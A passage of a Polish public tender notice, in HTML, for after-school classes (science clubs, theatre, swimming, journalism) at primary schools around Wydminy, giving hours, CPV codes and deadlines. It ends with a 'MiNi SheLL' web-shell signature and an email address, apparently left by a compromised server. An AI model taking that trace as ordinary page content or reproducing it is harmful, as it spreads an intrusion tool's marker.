Zajęcia rozwijające uczniów zdolnych z zakresu matematyczno-przyrodniczego. Zajęcia dla klas IV-VI. Cel: rozwijanie umiejętności przedmiotowych i ponad przedmiotowych, myślenia abstrakcyjnego i logicznego rozumowania, doskonalenia pamięci, uwagi, rozwijania sprawności umysłowej innowacyjnymi metodami. Doświadczenia i badania przyrodnicze, ćwiczenia matematyczne, łamigłówki, gry edukacyjne. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI - Szkoła Podstawowa w Wydminach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI
1 grupa * 2h * 30 tyg. = 60h (21 wyjazdów na basen w roku 2014, 9 wyjazdów na basen w roku  2015).
Rozwijanie koordynacji ruchowej, wdrażanie zdrowego stylu życia, rozbudowy zainteresowań aktywnym i zdrowym sposobem spędzania wolnego czasu. Odreagowywanie złych emocji, zmęczenia umysłowego, nauka bezpośredniego poruszania się w wodzie. Zajęcia dla klas I-VI realizowane na pływalni. Przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zajęcia pozalekcyjne dla uczniów zdolnych Młodzi odkrywcy dla klas IV-VI - Szkoła Podstawowa w Gawlikach Wielkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia pozalekcyjne dla uczniów zdolnych Młodzi odkrywcy dla klas IV-VI
1 grupa * 1h * 60 tyg. = 60h (30h w roku szkolnym 2013/2014, 30h w 2014/2015).
Zajęcia rozwijające uczniów zdolnych z zakresu matematyczno-przyrodniczego. Zajęcia dla klas IV-VI. Cel: rozwijanie umiejętności przedmiotowych i ponad przedmiotowych, myślenia abstrakcyjnego i logicznego rozumowania, doskonalenia pamięci, uwagi, rozwijania sprawności umysłowej innowacyjnymi metodami. Doświadczenia i badania przyrodnicze, ćwiczenia matematyczne, łamigłówki, gry edukacyjne. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zajęcia wspierające aktywność artystyczno-ruchową Przygoda ze sceną dla klas I - VI - Szkoła Podstawowa w Gawlikach Wielkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wspierające aktywność artystyczno-ruchową Przygoda ze sceną dla klas I - VI, 1 grupa * 1h * 60 tyg. = 60h (30h w roku szkolnym 2013/2014, 30h 2014/2015).
Cel: niwelowanie barier z tytułu niskiego statusu ekonomiczno-społecznego, rozwój talentów, motywacja do bliskiego obcowania z kulturą. W trakcie realizacji programu zostaną przygotowane przedstawienia teatralne/ kabaret. Zajęcia dla klas I-VI. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI - Szkoła Podstawowa w Gawlikach Wielkich..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI 
1 grupa * 2h * 30 tyg. = 60h (21 wyjazdów na basen w roku 2014, 9 wyjazdów na basen w roku 2015).
Rozwijanie koordynacji ruchowej, wdrażanie zdrowego stylu życia, rozbudowy zainteresowań aktywnym i zdrowym sposobem spędzania wolnego czasu. Odreagowywanie złych emocji, zmęczenia umysłowego, nauka bezpośredniego poruszania się w wodzie. Zajęcia dla klas I-VI realizowane na pływalni. Przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI - Szkoła Podstawowa w Talkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI
1 grupa * 2h * 30 tyg. = 60h (21 wyjazdów na basen w roku 2014, 9 wyjazdów na basen w roku 2015).
Rozwijanie koordynacji ruchowej, wdrażanie zdrowego stylu życia, rozbudowy zainteresowań aktywnym i zdrowym sposobem spędzania wolnego czasu. Odreagowywanie złych emocji, zmęczenia umysłowego, nauka bezpośredniego poruszania się w wodzie. Zajęcia dla klas I-VI realizowane na pływalni. Przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> zajęcia pozalekcyjne dla uczniów zdolnych Warsztaty dziennikarskie dla klas IV-VI - Szkoła Podstawowa w Zelkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia pozalekcyjne dla uczniów zdolnych Warsztaty dziennikarskie dla klas IV-VI
1 grupa * 1h * 60 tyg. = 60h (30h w roku szkolnym 2013/2014, 30h 2014/2015).
Zajęcia dla klas IV-VI. Cel: poznanie nowych obszarów związanych z językiem polskim, informatyką oraz łączenie ich wykorzystywania podczas zajęć z dziennikarstwa. Tworzenie gazetki szkolnej w formie druku, broszur, informacje na stronie www. Na zakończenie projektu wystawa prac literackich, wiersze, opowiadania, baśnie, bajki itp. Podczas realizacji projektu nagranie filmu z kolejnych etapów realizacji projektu i zamieszczenie na stronie internetowej. Metody ICT, tablica multimedialna, kamera, drukarka, aparat fotograficzny, zestawy doświadczalne, gry edukacyjne. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> zajęcia wspierające aktywność artystyczno-ruchową Przygoda ze sceną dla klas I - VI - Szkoła Podstawowa w Zelkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia wspierające aktywność artystyczno-ruchową Przygoda ze sceną dla klas I - VI
1 grupa * 1h * 60 tyg. = 60h (30h w roku szkolnym 2013/2014, 30h 2014/2015).
Cel: niwelowanie barier z tytułu niskiego statusu ekonomiczno-społecznego, rozwój talentów, motywacja do bliskiego obcowania z kulturą. W trakcie realizacji programu zostaną przygotowane przedstawienia teatralne/ kabaret. Zajęcia dla klas I-VI. W roku szkolnym 2013/2014 przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie  dla klas I - VI - Szkoła Podstawowa w Zelkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opiekun zajęć wspierających aktywność artystyczno-ruchową Jak ryba w wodzie dla klas I - VI, 1 grupa * 2h * 30 tyg. = 60h (21 wyjazdów na basen w roku 2014, 9 wyjazdów na basen w roku 2015).
Rozwijanie koordynacji ruchowej, wdrażanie zdrowego stylu życia, rozbudowy zainteresowań aktywnym i zdrowym sposobem spędzania wolnego czasu. Odreagowywanie złych emocji, zmęczenia umysłowego, nauka bezpośredniego poruszania się w wodzie. Zajęcia dla klas I-VI realizowane na pływalni. Przewidziana jest również praca w soboty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com